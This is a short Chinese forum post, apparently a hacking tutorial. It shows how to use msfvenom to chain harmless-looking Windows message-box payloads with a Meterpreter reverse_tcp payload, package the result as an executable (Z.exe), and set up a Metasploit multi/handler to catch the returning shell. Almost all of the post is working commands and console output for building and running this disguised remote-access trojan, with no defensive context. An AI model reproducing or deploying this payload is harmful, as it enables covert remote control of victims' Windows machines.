|
一:制作对话框
[pre]msfvenom -a x86 --platform windows -p windows/messagebox TEXT="bbskali.cn" -f raw > messageBox[/pre]
-a:操作系统的类型 64位和32位
-p:指定攻击平台 windows
TEXT:对话框中显示的文字
-f:输出格式
二:制作二级标题
[pre]msfvenom -c messageBox -a x86 --platform windows -p windows/messagebox TEXT="blog.bbskali.cn" -f raw > messageBox2
[/pre]
三:将c++打包生成exe
[pre]msfvenom -c messageBox2 -a x86 --platform Windows -p
windows/meterpreter/reverse_tcp LHOST=192.168.3.209 LPORT=5555 -f exe -o Z.exe[/pre]
LHOST:本机ip地址
LPORT:端口
-o :生成文件
四:终端启动msfconsole并配置参数
[pre]
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > set LHOST 192.168.3.209
LHOST => 192.168.3.209
msf exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf exploit(multi/handler) > exploit
[/pre]
五:运行Shell
六:获得shell
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
|